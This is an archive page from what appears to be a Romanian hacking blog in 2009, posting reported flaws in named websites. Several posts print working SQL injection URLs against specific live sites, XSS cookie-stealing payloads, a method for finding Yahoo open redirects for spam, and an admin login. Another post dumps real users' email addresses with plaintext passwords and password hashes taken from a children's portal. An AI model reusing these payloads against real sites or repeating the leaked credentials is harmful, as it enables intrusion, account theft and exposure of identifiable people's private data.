- Apocalipsa dupa Nemessis
- Cand dorinta de afirmare depaseste granitele bunului simt – PaxNwo un leecher ordinar
- Cum sa iti protejezi adresa e-mail si datele confidentiale din aceasta
- Mi s-a furat id-ul de messenger/adresa e-mail. Ce sa fac?
- Experiment social II – andimoisescu.ro
- Pentru posteritate
- In curand…
- “Hot” de id-uri messenger
- Chiar ca sunteti retardati
- Ce nu se invata la scoala – Vendetta (6)
- Apocalipsa dupa Nemessis in (166 Visits)
- Ce servicii de mail folositi? in (87 Visits)
- This is the end in (85 Visits)
- Hackersblog.org is now blog.rstcenter.com in (58 Visits)
- Raportare vulnerabilitati in (58 Visits)
- News in (55 Visits)
- La multi ani România, la multi ani românilor in (55 Visits)
- Un nou membru in (54 Visits)
- De reţinut in (54 Visits)
- So... lol in (51 Visits)
- Mi s-a furat id-ul de messenger/adresa e-mail. Ce sa fac? in (780 Visits)
- SMS scam (1) in (97 Visits)
- Hi5.com coders read this in (94 Visits)
- Dezinformare sau proasta informare? in (78 Visits)
- Si tentativele de phishing pot fi amuzante in (76 Visits)
- Phishing Bancpost in (74 Visits)
- Phishing Raiffeisen cu atasament html in (71 Visits)
- [Utilitare] Suna gratis de pe internet sau de pe iPhone in (228 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in (188 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (164 Visits)
- Cum sa iti protejezi adresa e-mail si datele confidentiale din aceasta in (162 Visits)
- Despre CSRF, hi5.com, cum sa trisezi la concursuri s.a.m.d. in (154 Visits)
- Virusi in clipuri video [how to] in (148 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (130 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (127 Visits)
- Ca musca in... in (87 Visits)
- Internet vs. privacy (1) in (60 Visits)
- Simpatie.ro, matrimoniale3x.ro, apetisant.ro, deliciu.ro , etc Sql injection in (735 Visits)
- usa.kaspersky.com hacked ... full database acces , sql injection in (544 Visits)
- RedTube.com ... The Free Sex Video Community in (185 Visits)
- Yahoo! epic fail - permanent xss unleashed in (155 Visits)
- In atentia BitDefender.com, SQL Injection in (149 Visits)
- Telegraph.co.uk hacked, sql injection in (138 Visits)
- No comment - o2.co.uk (forum) in (136 Visits)
- Facebook hacked - sql injection in (131 Visits)
- eJobs.ro si peste 1.300.000 de conturi cu date personale in (130 Visits)
- F-Secure.com - SQL Injection + Cross Site Scripting in (124 Visits)
- Hacker Uses XSS and Google Street View Data to Determine Physical Location in (97 Visits)
- Wannabe Hackers [1] - Cum sa hack-uiesti RapidShare-ul in (94 Visits)
- Wannabe Hackers [2] - cum sa faci un virus by sppy_hacker in (71 Visits)
- Digital Photocopiers Loaded With Secrets in (63 Visits)
- [Video] The History Of Hacking in (47 Visits)
- Christopher "moot" Poole: The case for anonymity online in (45 Visits)
- OWASP Phishing demo in (34 Visits)
- Owasp5005 Part1 - New zero-day browser exploits - ClickJacking in (33 Visits)
- Email Security - Why You Should Encrypt Your Email - Part One in (32 Visits)
- Hope 2603 – Kevin Mitnick - Life a Computer Hacker – Revealed in (31 Visits)
- Se poate sparge parola de Yahoo? in (753 Visits)
- Forumul Andreei Balan spart in (309 Visits)
- phpBB.ro hacked in (291 Visits)
- Camera de supraveghere a universitatii Alexandru Ioan Cuza din Iasi in (153 Visits)
- Experiment social in (145 Visits)
- Experiment social II - andimoisescu.ro in (136 Visits)
- Doua cu Netbridge si una cu Hi5 in (115 Visits)
- Cand dorinta de afirmare depaseste granitele bunului simt - PaxNwo un leecher ordinar in (110 Visits)
- Site-ul Inspectoratului General al Politiei Romane (igpr.ro) a fost spart in (109 Visits)
- Ce nu se invata la scoala – Vendetta (6) in (107 Visits)
Archive for January, 2009
Posted on January 26th, 2009
Stiti care sunt cele mai multe site-uri raportate prin mail? Cele ce apartin de http://*.politiaromana.ro. Stiti cate subdomenii ale politiaromana.ro sunt vulnerabile? Toate. Adica virgula chiar toate.
Siguranta si incredere oameni buni.
Nu vom face un articol in care sa dezvoltam discutia despre aceasta problema (pentru ca vor exista cu siguranta si persoane rau intentionate care vor vrea sa le faca ravagii “iubitilor” oameni ai legii) dar le multumim celor care ne-au atentionat.
Posted on January 26th, 2009
Raportat de Pax Nwo:
http://www.tnb.ro/index.php?page=spectacol&idspec=118 and 1=0 union select all username,password,3,4,5 from cms_users–
http://www.tnb.ro/admin/login.php
user : admin
pass: g[cenzurat]3
Multumim Pax
Posted on January 26th, 2009
Vulnerabilitate raportata de daemien:
Site URL: http://www.shop-jante.ro
DB Name:cardesign_new
Versiune database: 5.0.22
————–
La prima vedere pare un site banal, un simplu shop de jante aliaj [ce-i drept numai marci high-end]. Pacat de numarul mare de clienti [persoane fizice cat si juridice] care nu stiu la ce riscuri se expun atunci cand se inregistreaza pe acest site, evident slab securizat!
Se pot extrage cu usurinta informatii din baza de date precum: username, parola, email, nume, prenume, adresa, serie BI, CNP, telefon, cont, banca etc…
Pretty fucked up.. huh?! 
))))))))
————–
Tabele:
http://www.shop-jante.ro/search.php?id=2+and+1=0+union+select+1,2,table_name,4%20from%20information_schema.tables–
Coloane:
http://www.shop-jante.ro/search.php?id=2+and+1=0+union+select+1,2,column_name,4%20from%20information_schema.columns–
Multumim daemien
Posted on January 26th, 2009
You wanna see how Yahoo! php codes looks like? Now you can:
1.
Mirror - http://pastebin.com/fe7acac0
2.
http://au.lifestyle.yahoo.com/who/news/20102008/madonna-to-raise-kids-in-new-yorkhtml
Mirror - http://pastebin.com/f6ffa4275
3.
http://cn.yahoo.com/preferences
Mirror - http://pastebin.ca/1318131
4.
http://uk.videogames.games.yahoo.com/95/news/no-rest-for-the-wicked–least-not-for-the-wicked-schedulers-lining-products-up-for-the-wii-virtual-console-this-week–don-t-they-ever-get-a-d
Mirror - http://pastebin.com/f5399d409
Enjoy
Special thanks goes to google for indexing so good
Posted on January 26th, 2009
A nu se pune functia “more” dupa un text scris in “italic”. Sunt sanse mari sa dispara sidebar. Vedeti si voi logica la fel ca si mine, nu-i asa?
Posted on January 26th, 2009
O lege nescrisa a webmail-ului este sa nu accepti javascript in mesaje pentru a proteja conturile userilor. In categoria celor care nu stiau acest lucru se afla si cei de la luxmail.ro.
In primele doua minute de teste am crezut ca este un serviciu robust cu filtre anti xss destul de bune. Nu a trebuit insa sa ma chinui prea mult pentru ca am vazut urmatoarea optiune in casuta de compunere a mesajului:
Am crezut ca cineva a avut chef de glume cand a introdus acea optiune dar…
Iar rezultatul este urmatorul:
Acum domnilor de la luxmail.ro ce mai pot sa spun. Good job. Stiti ce pot pati userii dumneavoastra? Se pot pomeni ca cineva le fura cookies si le acceseaza mailul. Sau un mic xss worm il obliga pe user sa trimita un anumit mesaj catre toti cei din lista de contact, lucru ce duce la propagarea problemei voastre. Cand asigurati servicii de mail chiar trebuie sa aveti securitatea foarte bine pusa la punct. Datele confidentiale ale oamenilor sunt in mainile voastre si nu trebuie sa aiba nimeni acces la ele.
Concluzia? Nu folositi acest serviciu. Puteti avea surprize extrem de neplacute.
Sintaxa folosita in demonstratie este <a href=javascript:alert(document.cookie)>Text oarecare</a>. Puteti folosi editorul html din serviciul lor de mail pentru a dezvolta demonstratia.
Posted on January 25th, 2009
Acest articol este scris atat in limba romana cat si in engleza.
Rude.com is an online adult community with a large number of members. Its pretty heavy and stuffed with alot of features in their desire to unite several adult services into one large site. Such features as porn videos, amateur videos, amateur live cams, private cams, social network, xxx games etc., seem to manage to attract some attention to it.
Yet, visiting rude.com can be a hazard for you. Why?
You can insert javascript in any comments box of each profile. I dont mean inserting the script in your own profile but the possibility to do this with ALL the profiles on the website.
The method is extremely simple. With your comment, add <img src=”" onerror=”evil javascript code”>, which gets executed everytime someone sees that profile. Example: <img src=”" onerror=”alert(1)”>.
This vulnerability is extremely dangerous for rude.com users especailly when we know there are payed services on the website. Wouldn’t want to be one of their paying members.
Suppose you are a paying client and want to see a live xxx show. You buy some chips (credit) and while you do that, your session cookie gets stolen. Next thing you know, your credit is being used by someone else. And here you are faced with two options:
1. You dont notice that and you dont take any counter measure.
2. You notice and make a chargeback and the model and the website loses their money. Your credit score is affected, the website gets a bad reputation and the model is left with no money.
Of course this kind of vulnerability can be used for phishing, generate traffic on other websites or to hide some XSS attacks targeting other websites (yahoo, gmail, ebay, paypal etc.).
The possiblity to insert an XSS worm is extremely simple and the owners of this website know about this isue for over a year and still, nobody seems to bother.
Rude.com este o comunitate adult cu un numar mare de membri. Este un site stufos ce si-a dorit sa uneasca mai multe servicii gen porn videos, amateur videos, amateur live cams, private cams, social network, xxx games etc., complexitatea acestuia facandu-l destul de cunoscut in US.
Si totusi este un adevarat pericol sa vizitezi acest site. De ce?
Posted on January 25th, 2009
Pentru viitoarele articole mi-ar prinde bine sa stiu ce servicii de mail in afara de GMail, Yahoo! mail si Hotmail, mai folosesc romanii, asa ca va rog sa lasati un comentariu cu serviciile webmail pe care le mai folositi.
Excludeti din start cele 3 site-uri de mai sus si mailurile firmelor unde sunteti angajati. Se vor lua in calcul doar serviciile de tip free webmail.
Multumesc.
Posted on January 25th, 2009
Acest articol este publicat atat in romana cat si in engleza.
Yahoo redirects are and have been continuously used in spam tehniques, for phishing and black SEO. Even though Yahoo is struggling to solve this problem, they are easy to find. When I say ease i mean seconds not minutes or hours
The whole trick is to know how a patched link looks like.
Its not hard at all. All you need is:
Firefox
Link Gopher add-on
A search engine.
How does a link that can be used as for a redirect looks like?
http://us.ard.yahoo.com/SIG=15temu9ra/M=289534.6253107.7244481.6080815/D=classreal/
S=750052198:FOOT/Y=YAHOO/EXP=1232849833/L=BmyXB86.ODX4VzI3SXtvrR9kVmjCm0l7r4kACp1e/
B=NoaQBNj8a.0-/J=1232842633729605/K=pIWiCLQq81S96lmhwDqmiw–
/A=2650127/R=2/SIG=11lp7krrc/*http://docs.yahoo.com/info/copyright/copyright.html
How does a link that can NOT be used as for a redirect to a site outside *.yahoo.com look like?
http://rds.yahoo.com/_ylt=AkWscG8XXla3AoABf80g_WeHHwx.;_ylv=0/
SIG=11idii63e/EXP=1232929280/**http%3A//hk.knowledge.yahoo.com/
How can we tell which link can be used? Notice this part of the link (from the first example):
SIG=11lp7krrc/*http://docs.yahoo.com/info/copyright/copyright.html After /* there follows the unaltered link to a diffrent domain.
The second link is a bit diffrent.
1232929280/**http%3A//hk.knowledge.yahoo.com/
Don’t mind the number of “stars”. This is what tells us that this redirect is useless: http%3A//.
All links from redirect that start with http%3A// cannot be used for sites outside yahoo.com.
I can bet that there wont be more then a week from now (the moment of posting the article) and this bug will be fixed cause we noticed a sudden love from Yahoo staff who is kind enough to pay us visits almost every day
Versiunea in limba romana:
Posted on January 24th, 2009
“Dedicat copiilor, ofera conturi de e-mail gratuite, informatii despre examenele de capacitate si admitere, concursuri, programul TV, referate, basme,etc” …deci un alt site cu trafic mare, prezent in top 10 (cu peste 1 milion de vizite) este vulnerabil la blind sql injection. De data asta aveam de-a face cu o baza de date PostgreSQL, mult mai greu de extras date, dar cum o sa vedeti mai jos, nu imposibil.
Prima data sa vedem tabelul sys_user
+—————————-+—————+———-+————–+
| email | name | password | username |
+—————————-+—————+———-+————–+
| adresa de mail | Administrator | 123456 | admin |
| sorin.spanu@activesoft.ro | Sorin Spanu | 123456 | sorin |
| sorin.henrik@activesoft.ro | Sorin Henrik | 123456 | sorin.henrik |
+—————————-+—————+———-+————–+
Din tablelul denumit utilizator, care are peste 200.000 de utilizatori inregistrati am extras 10 randuri. Din nou, dezamagire … parolele utilizatorilor sunt salvate,stocate in text clar.
+———————————+—————-+————-+
| email | nick | parola |
+———————————+—————-+————-+
| ghisamarius84@yahoo.com | ghisa | bobita |
| just_obsesion@yahoo.com | babydoll19 | leliamirela |
| gabriela_ionescu_2005@yahoo.com | GABRI | DAEW |
| patronuira@yahoo.com | 170279 | alex |
| antidot_s3f@yahoo.com | Silviu_bastanu | termopan |
| racautanu_anamaria@yahoo.com | robertik | robertik |
| a3x_14@yahoo.com | Parazitual3cs | 140493 |
| dany_fellow_2000@yahoo.com | lupudaniel | zenovia |
| cornelia_lupa@yahoo.com | cornelia_lupa | toyota |
| alina_vlad852004@yahoo.com | pestisorulroz | 30041999 |
+——————————–+—————-+————-+
Din tablelul chat_users am extras primii 5 useri. Macar parolele lor nu mai sunt salvate in text clar.
+—————+———————————-+
| nick | password |
+—————+———————————-+
| scumpy_k_a4 | 6c48441b0d58474e829857663a937488 |
| BUG_MAFIA_16 | b913a1407380f9486e46d8b9ca5a2d40 |
| FrumusikaNO1 | dc599a9972fde3045dab59dbd1ae170b |
| printeza_anne | 894ad006486ed309cb02edee7d0a4647 |
| thrfhsfer7_t | a87ff679a2f3e71d9181a67b7542122c |
+—————+———————————-+